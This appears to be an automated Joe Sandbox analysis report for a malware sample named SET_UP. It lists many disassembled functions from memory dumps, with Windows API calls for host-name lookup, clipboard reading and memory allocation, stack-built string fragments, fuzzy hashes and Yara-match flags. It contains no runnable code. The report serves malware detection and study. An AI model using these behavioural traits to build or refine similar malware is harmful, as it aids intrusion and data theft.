                                                                                                            • Opcode Fuzzy Hash: 3d5c4c73b8cd980c4c8375e1ef1dec9b45bff81b44079878591eca1e68bd64c3
                                                                                                            • Instruction Fuzzy Hash: 94410574E086509BDB6AAA2098617FF7357DF82718F44442CC54B27381DB22AD46CDB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: ab199846b783ab5a69d35bebb13cfa8cc0329ff8bf8bbeee3fb718beba712974
                                                                                                            • Instruction ID: db7012a53f41380cb84bfa428b1967d72662e6f63a6f07014052c8d12846c1f9
                                                                                                            • Opcode Fuzzy Hash: ab199846b783ab5a69d35bebb13cfa8cc0329ff8bf8bbeee3fb718beba712974
                                                                                                            • Instruction Fuzzy Hash: 3D31E27094D7D14BE7198B28856077BFBD1EF82315F189A2CE1C38B682E3A48816CB55
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?), ref: 0251F6C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: .dll
                                                                                                            • API String ID: 1029625771-2738580789
                                                                                                            • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                            • Instruction ID: 046ef72961be4e7edc0f7286c0d411f079825ebc5b491fc7c2d62955eec69841
                                                                                                            • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                            • Instruction Fuzzy Hash: BB21E4726007859FF721DF68C884B6A7FA4BF05268F18416DD845CBE61D730E8458B88
                                                                                                            APIs
                                                                                                            • GetComputerNameExA.KERNEL32(00000006,?,00000100), ref: 02DDCD74
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ComputerName
                                                                                                            • String ID: "+>5
                                                                                                            • API String ID: 3545744682-135384822
                                                                                                            • Opcode ID: 9cdb03f193b17d8aa92438abcc98e15c5505fa0d7eb7f1b85eeb8ff649cdea49
                                                                                                            • Instruction ID: 75a8423e30c9ca3aed1d0e2306ef86d94b192362eaaaa1f8af52c11bce4925b2
                                                                                                            • Opcode Fuzzy Hash: 9cdb03f193b17d8aa92438abcc98e15c5505fa0d7eb7f1b85eeb8ff649cdea49
                                                                                                            • Instruction Fuzzy Hash: 7E11E07164D3805BD768CF3998553EBBFE6AB8A308F58886DC0CECB255DA314805CB52
                                                                                                            APIs
                                                                                                            • GetComputerNameExA.KERNEL32(00000005,8ABDA141,00000100), ref: 02DDCE7D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ComputerName
                                                                                                            • String ID:
                                                                                                            • API String ID: 3545744682-0
                                                                                                            • Opcode ID: 6e416a22c7b0816463b0ff0d783834739f501db042005221ca2cf76aee546152
                                                                                                            • Instruction ID: 1569e8e90a2c0f04871bf2bd3a768c35e79bbfa4e56526832e327617b4b1eadc
                                                                                                            • Opcode Fuzzy Hash: 6e416a22c7b0816463b0ff0d783834739f501db042005221ca2cf76aee546152
                                                                                                            • Instruction Fuzzy Hash: AB21467055DBD18AEB398A34C8547E67BE29BC7354F0889AEC0DA8B385CB3C4406C752
                                                                                                            APIs
                                                                                                            • GetComputerNameExA.KERNEL32(00000005,8ABDA141,00000100), ref: 02DDCE7D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ComputerName
                                                                                                            • String ID:
                                                                                                            • API String ID: 3545744682-0
                                                                                                            • Opcode ID: 919b69b2b6914e7e82747853f2903d70d84a9a3b679b550a0e01d662376817c5
                                                                                                            • Instruction ID: 5bc2eef563b038a7d70faaf0bb1073910e320435bf829901afc7400309aa4999
                                                                                                            • Opcode Fuzzy Hash: 919b69b2b6914e7e82747853f2903d70d84a9a3b679b550a0e01d662376817c5
                                                                                                            • Instruction Fuzzy Hash: CA21257165DB818BEB398A34C8457E667929BC6350F19CA6EC4EA8B384CA7C4406C792
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0251E2FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                            • Instruction ID: e5497a50f4b7a1c7a5f0e5ae15e06331f0191dff43a16784543684353c57b301
                                                                                                            • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                            • Instruction Fuzzy Hash: 86B1D271500706ABFB219F60CC82BAFBBE9FF49314F140929ED8996140E731F950DBA9
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BlanketProxy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3890896728-0
                                                                                                            • Opcode ID: f751cc6b4db67ce66bcefe050b8d54db64080335babe9121f4bd8ed88be730e9
                                                                                                            • Instruction ID: 0cd8a34fba961a866bdb56673b74f68248e17f791752c4d07633ed4510f8186e
                                                                                                            • Opcode Fuzzy Hash: f751cc6b4db67ce66bcefe050b8d54db64080335babe9121f4bd8ed88be730e9
                                                                                                            • Instruction Fuzzy Hash: 76F012B16487428FE340DF25C1A834BBBE2AB84304F25890DE4994B384C7B6A909CFC2
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BlanketProxy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3890896728-0
                                                                                                            • Opcode ID: b79174c7fd9de06a1d2fb6d6671e533adb26dcc1b5e536de64c1b0d01f40459f
                                                                                                            • Instruction ID: f3bb67144e15d796b7f6e3ff0b4ec390b17a14d38783a1db86a4291d6c2f1ee8
                                                                                                            • Opcode Fuzzy Hash: b79174c7fd9de06a1d2fb6d6671e533adb26dcc1b5e536de64c1b0d01f40459f
                                                                                                            • Instruction Fuzzy Hash: 4CF098B45097018FE354DF28D5A8B5BBBF0FB84308F10891CE5998B381C7B69A59CF86
                                                                                                            APIs
                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02DBC535
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 640775948-0
                                                                                                            • Opcode ID: 39cb5c63a1c55d221709c6041d657572b240f2bc3a22c65f4fcca951609ee3fb
                                                                                                            • Instruction ID: 144c1922f4028f063baf6737bf28396f9644443d614660e30778fad9a3f43298
                                                                                                            • Opcode Fuzzy Hash: 39cb5c63a1c55d221709c6041d657572b240f2bc3a22c65f4fcca951609ee3fb
                                                                                                            • Instruction Fuzzy Hash: E0D0C930BD43007BF5A58608EC17F1273116701F11F340A09B762FE3C1C9E079218A1C
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,565147DB,0EDD9DCD,02DB8734,565147DB), ref: 02DEAEA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 804c3f4c9de9995cc55c853886066e816a051a204802a188f22948a2349a3829
                                                                                                            • Instruction ID: ce2cbb8093d2d2361e8046c0e1aa4cc72d3584ca3619561d3a92793610d02185
                                                                                                            • Opcode Fuzzy Hash: 804c3f4c9de9995cc55c853886066e816a051a204802a188f22948a2349a3829
                                                                                                            • Instruction Fuzzy Hash: 81C04C31485120AAD9142B15EC04B867B55DF45360F014455B0496A175C6616CD2DA94
                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(?,00000000), ref: 02DEAED0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 568eebe2839f365457564faac408a49273c5cb298e162b9a294ba18494fde237
                                                                                                            • Instruction ID: dc3f842ea3d1d514fc91555eb05be25453aaecedc73b4c6fe8091e72a050b86c
                                                                                                            • Opcode Fuzzy Hash: 568eebe2839f365457564faac408a49273c5cb298e162b9a294ba18494fde237
                                                                                                            • Instruction Fuzzy Hash: B0B012310C4010BAD9153B11BC08FC53F11DB04320F010441F0099C0BCC6115CD3DD9C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $!$$$$$%$&$'$)$+$+$-$-$-$/$1DN$2$3$5$6$6$7$8$=$A$C$D$D$D$D$D$D$E$F$G$I$I$I$I$I$J$K$L$L$M$M$M$M$M$N$O$P$Q$R$W$Y$[q@%$[q@%$^$_$_$`$`$a$d$e$f$h$h$i$j$m$n$o$p$r$t$v$x$z$|$|$|$}$}$}$~$~
                                                                                                            • API String ID: 0-1354559672
                                                                                                            • Opcode ID: a51e576f341f64e1ef9fac35ea258f072a008e9f6fee50c58a8dd0fb690d7b7a
                                                                                                            • Instruction ID: dec22b2c8e68d56a900bb4c7a536e04414637e0d088f7484a367cc180d8443e5
                                                                                                            • Opcode Fuzzy Hash: a51e576f341f64e1ef9fac35ea258f072a008e9f6fee50c58a8dd0fb690d7b7a
                                                                                                            • Instruction Fuzzy Hash: 5D13903150C7C18AD7259B3888543AFBFD26BD6324F188A6ED4EA873D2D7798446CB13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $ $"$$$&$($($)$*$,$.$0$2$3$4$4$6$8$9$:$<$>$C$D$F$G$H$J$J$M$M$R$S$V$W$\$]$^$f$f$h$i$k$l$n$r$t$v$w$x${
                                                                                                            • API String ID: 0-1321794508
                                                                                                            • Opcode ID: b7e1ba1e60ee55682cb06c9d2180f62eef2bcb3b0739820445750b1258d2ae54
                                                                                                            • Instruction ID: 01ff44293c39fe400aef6a2e570ebfbc01828ffffb26937ae1985d6193672297
                                                                                                            • Opcode Fuzzy Hash: b7e1ba1e60ee55682cb06c9d2180f62eef2bcb3b0739820445750b1258d2ae54
                                                                                                            • Instruction Fuzzy Hash: A3221E219087EA89DB32C63C8C187DDBFA15B23224F0843D9D5E96B3D2D3754B85CB66
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: '$0$<$>$>$A$C$E$G$H$H$I$I$K$M$O$P$S$Z$`$a$b$c$e$g$h$i$j$j$k$l$m$n$o$q$s$t$u$v$w$w$y${$}
                                                                                                            • API String ID: 0-1003443676
                                                                                                            • Opcode ID: 038e634d7cb700a839d3bac2e55f852d884226695258920fb779a303214765e0
                                                                                                            • Instruction ID: 8bb635d1ba1ebb48d998bbda035ad9447467ac956940422dc34e647b1e4764ed
                                                                                                            • Opcode Fuzzy Hash: 038e634d7cb700a839d3bac2e55f852d884226695258920fb779a303214765e0
                                                                                                            • Instruction Fuzzy Hash: ECE1A421D087D98EDB22CA7C88543DDBFB15B12324F1847D8D4E9AB3D2C7794A46CB62
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                            • String ID: A$G$H$I$L$N$u$y$z${$|
                                                                                                            • API String ID: 1494355150-2406466783
                                                                                                            • Opcode ID: 3cde53e521883bcf5d49d5a7d26d8debd50c67a54de37fa5ec6a714c58620a62
                                                                                                            • Instruction ID: 349e0836642b0f15563185c46597beca59e2dd127f795287f607a59d8385c7e0
                                                                                                            • Opcode Fuzzy Hash: 3cde53e521883bcf5d49d5a7d26d8debd50c67a54de37fa5ec6a714c58620a62
                                                                                                            • Instruction Fuzzy Hash: 8341B17150C381CFD305AF78D88835EBFE19F85314F04492EE9DA8A391D2B98949C7A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$0$1$2$3$3$6$6$8.ns$G$H$j$w$z
                                                                                                            • API String ID: 0-1307680846
                                                                                                            • Opcode ID: f9b27b457007c0b7702181ed369a751ebc63dccd07b554c52a4e1a16731729ce
                                                                                                            • Instruction ID: e003e6b2fda78f022ae5bd9311986ec2bd91d9b5433ce7deda80f062d36983a6
                                                                                                            • Opcode Fuzzy Hash: f9b27b457007c0b7702181ed369a751ebc63dccd07b554c52a4e1a16731729ce
                                                                                                            • Instruction Fuzzy Hash: 1062917660C7908BD3259A3884A53DFBBD2AFC9320F198E2DD4EA873C1D6748905CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$0$1$2$3$3$6$6$8.ns$G$H$j$w$z
                                                                                                            • API String ID: 0-1307680846
                                                                                                            • Opcode ID: 759e6d93ab9417db672fe1b6c3737d3fd241ba7a4953c5ffacb7a69507c35dd7
                                                                                                            • Instruction ID: b20f5be1a067e791b14688bde31fe525b761758262d5e1c324b0dd9de89858e5
                                                                                                            • Opcode Fuzzy Hash: 759e6d93ab9417db672fe1b6c3737d3fd241ba7a4953c5ffacb7a69507c35dd7
                                                                                                            • Instruction Fuzzy Hash: 2E62AF3260C7908BD724DF38C4953AFBBD2ABC5324F198A6ED8EA973C1D6748545CB42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: &$($($)$)$*$*$0$7$9$:$C$k$k
                                                                                                            • API String ID: 0-979845838
                                                                                                            • Opcode ID: 26717e049a2fcb75e99d98968bc6f1fc6a7aa0c9b4d11643f5a77c5cf74f3bce
                                                                                                            • Instruction ID: 322cbffcb9d925d836f40e48b3959df8093bf3eb3b7118395d3b307ae82e3f77
                                                                                                            • Opcode Fuzzy Hash: 26717e049a2fcb75e99d98968bc6f1fc6a7aa0c9b4d11643f5a77c5cf74f3bce
                                                                                                            • Instruction Fuzzy Hash: 6491D22360D7D14AE741993C489425BEEC24BE6138F2E8BADD4F6873D2D579C906C3A3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: &$($($)$)$*$*$0$7$9$:$C$k$k
                                                                                                            • API String ID: 0-979845838
                                                                                                            • Opcode ID: 26717e049a2fcb75e99d98968bc6f1fc6a7aa0c9b4d11643f5a77c5cf74f3bce
                                                                                                            • Instruction ID: 864180c5e2a1c5ca73cec70650955094ddbfe4201cdcf5155352d4ea7dbff8c9
                                                                                                            • Opcode Fuzzy Hash: 26717e049a2fcb75e99d98968bc6f1fc6a7aa0c9b4d11643f5a77c5cf74f3bce
                                                                                                            • Instruction Fuzzy Hash: 5D91F32360D7D14AD301893C4C9865BAEC25BE6138F2E8BADD8F5873D6C579C90AC397
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4$8$;$G$X$Y$g$m$|$|$}
                                                                                                            • API String ID: 0-3562119128
                                                                                                            • Opcode ID: de07b2411b661feaa281c387a796919f1cda83389bad2510f91f143b8ec5f750
                                                                                                            • Instruction ID: db92638c859d5b603e825ad0ae7e05451ddcabe00c12e69266f0d3c5b0b3f962
                                                                                                            • Opcode Fuzzy Hash: de07b2411b661feaa281c387a796919f1cda83389bad2510f91f143b8ec5f750
                                                                                                            • Instruction Fuzzy Hash: 7722B472A0C791CBD7259F38C4953AEBBE2AFC5314F198A2ED4DA97381D6748C01CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4$8$;$G$X$Y$g$m$|$|$}
                                                                                                            • API String ID: 0-3562119128
                                                                                                            • Opcode ID: 8fb480367e0cb58052beebd29bc1c4592244a714d1986483f90d37a6cfe56c31
                                                                                                            • Instruction ID: 12ff9de62e8b76aa468bdf224b7af639619cfeeb2e75892aca311693a05a6101
                                                                                                            • Opcode Fuzzy Hash: 8fb480367e0cb58052beebd29bc1c4592244a714d1986483f90d37a6cfe56c31
                                                                                                            • Instruction Fuzzy Hash: FA22B371A0C7908BD724DF39C4913AEBBE6ABC5310F198A2FD8DA97381D6748941CB53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: '$)$+$2$J$O$Z$\$\$t
                                                                                                            • API String ID: 0-2531731213
                                                                                                            • Opcode ID: d724b1b54b5f4fd4ab58e5212955339e59e72cd5f4c87be0cde4b76f3c3714a8
                                                                                                            • Instruction ID: 4245b1dd1d487eb6dcad63ab8c4316253afcd2ba9d29186373b81e7614b7f47a
                                                                                                            • Opcode Fuzzy Hash: d724b1b54b5f4fd4ab58e5212955339e59e72cd5f4c87be0cde4b76f3c3714a8
                                                                                                            • Instruction Fuzzy Hash: CB527E7160C7908FE7249B39C5943AFBBE2AB85320F198A6ED5DE873C1D6758841CB43
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: /$ $FEM%'.$! $"=$K$60(0$M%'.$adtd$mGi4
                                                                                                            • API String ID: 0-3461866429
                                                                                                            • Opcode ID: 48e3fa3f29aca8b2cc569b511863654e84a7395ce20b7e38bdfbc1eb0e68cb6f
                                                                                                            • Instruction ID: bead8f724b8c118bf7280fe13aa31b6a88204efba2e663cdea5d7fbc0f148b5b
                                                                                                            • Opcode Fuzzy Hash: 48e3fa3f29aca8b2cc569b511863654e84a7395ce20b7e38bdfbc1eb0e68cb6f
                                                                                                            • Instruction Fuzzy Hash: 9FD1E76150D3D18BC3268F3984B03EAFFE19F97214F18869DE5D64B386D728C906CB96
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: /$ $FEM%'.$! $"=$K$60(0$M%'.$adtd$mGi4
                                                                                                            • API String ID: 0-3461866429
                                                                                                            • Opcode ID: 48e3fa3f29aca8b2cc569b511863654e84a7395ce20b7e38bdfbc1eb0e68cb6f
                                                                                                            • Instruction ID: 70b73a629b327c0c5d7b790857d6628d61653dddcb761031088ce66388e9a8c8
                                                                                                            • Opcode Fuzzy Hash: 48e3fa3f29aca8b2cc569b511863654e84a7395ce20b7e38bdfbc1eb0e68cb6f
                                                                                                            • Instruction Fuzzy Hash: BDD1F76150D3A18BC326CF3984A036BFFE19F97615F188A9DE4D54B382D7348506C796
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )F7$-$5$9J2"$DgeX$E0WP$XX]R
                                                                                                            • API String ID: 0-44759821
                                                                                                            • Opcode ID: a36dcd1ca9ca2d11dfeda94c749957fedb802d63fdf29b84f461547ffadc3508
                                                                                                            • Instruction ID: 33318f33c14fcc04f395e7d85c4257c000f442f52f41acf4879462b27645bb41
                                                                                                            • Opcode Fuzzy Hash: a36dcd1ca9ca2d11dfeda94c749957fedb802d63fdf29b84f461547ffadc3508
                                                                                                            • Instruction Fuzzy Hash: 8A426AB590C3918FD721DF24C85076EBBE2AF85314F188A6CE8E59B392D7358D06CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )F7$-$5$9J2"$DgeX$E0WP$XX]R
                                                                                                            • API String ID: 0-44759821
                                                                                                            • Opcode ID: e96b362fac33fbf22cc7f4818dacddf6c9976ee7ffd05119d419a07ef5262f56
                                                                                                            • Instruction ID: a3fe2a64d4360c0d84636da8fdf0a19e77e3a8f669a1a68d56ff5d4d365994bd
                                                                                                            • Opcode Fuzzy Hash: e96b362fac33fbf22cc7f4818dacddf6c9976ee7ffd05119d419a07ef5262f56
                                                                                                            • Instruction Fuzzy Hash: 294248755083808FD721CF28C85076FBBE2AFD6314F08866EE9E59B392D7358909CB52
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ;6=p$h}|Q$js5f$pd.$$sgda$skTa$|~&
                                                                                                            • API String ID: 0-3589289367
                                                                                                            • Opcode ID: 4912e4ca686aa6d7d92cfeeef5c4c765119ede629a5a02935913b76dfdf22952
                                                                                                            • Instruction ID: c6491e45405c3ad3b52b4054356bb67bbd27ee80cf9c7d95f540aa3094df0629
                                                                                                            • Opcode Fuzzy Hash: 4912e4ca686aa6d7d92cfeeef5c4c765119ede629a5a02935913b76dfdf22952
                                                                                                            • Instruction Fuzzy Hash: 9B71ABB454C3C18ED371CF2594A47EFBBE0ABA3304F1489AEC4D96B256C736044ACB56
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: !.$# $C$[HLE$\$uz{x
                                                                                                            • API String ID: 0-660603629
                                                                                                            • Opcode ID: 8e21d55a7b5aee6e5ea530e46225d7a5e0ce7525be293d76fbd1ec8564b4b2f7
                                                                                                            • Instruction ID: c3f39c0754a3497391c8ce51ae9809f0a6a2d6d369a3a4bd64b36fa91526daba
                                                                                                            • Opcode Fuzzy Hash: 8e21d55a7b5aee6e5ea530e46225d7a5e0ce7525be293d76fbd1ec8564b4b2f7
                                                                                                            • Instruction Fuzzy Hash: E642FC72A483008BD310CF28CD8076BBBE6FFC5B14F198A2CE5859B295D774D909CB96
                                                                                                            Strings
                                                                                                            Memory Dump Source
